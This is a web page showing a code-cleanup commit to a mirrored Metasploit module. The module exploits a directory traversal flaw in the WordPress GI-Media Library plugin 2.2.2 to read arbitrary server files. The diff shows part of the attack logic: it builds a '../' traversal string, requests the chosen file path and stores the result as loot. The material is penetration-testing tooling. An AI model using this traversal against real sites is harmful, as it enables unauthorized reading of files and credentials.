infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-04-24 11:07:13 -05:00
parent e51897d64e
commit 5ca6fe3cb0
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 5 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb
View File

@ -16,8 +16,9 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'WordPress GI-Media Library Plugin File Read Vulnerability',
'Description' => %q{
This module exploits a directory traversal vulnerability in WordPress Plugin
"GI-Media Library" version 2.2.2, allowing to read arbitrary files on
Wordpress directory.
GI-Media Library version 2.2.2, allowing to read arbitrary files from the
system with the web server privileges. This module has been tested successfully
on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.
},
'References' =>
[
@ -44,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
traversal = "../" * datastore['DEPTH']
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ /^\//
@ -58,10 +59,6 @@ class Metasploit3 < Msf::Auxiliary
)
if res && res.code == 200 && res.body && res.body.length > 0
print_status('Downloading file...')
print_line("\n#{res.body}")
fname = datastore['FILEPATH']
path = store_loot(
@ -74,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Nothing was downloaded. Check the correct path wordpress files.")
vprint_error("#{peer} - Nothing was downloaded. Check the correct path wordpress files.")
end
end
end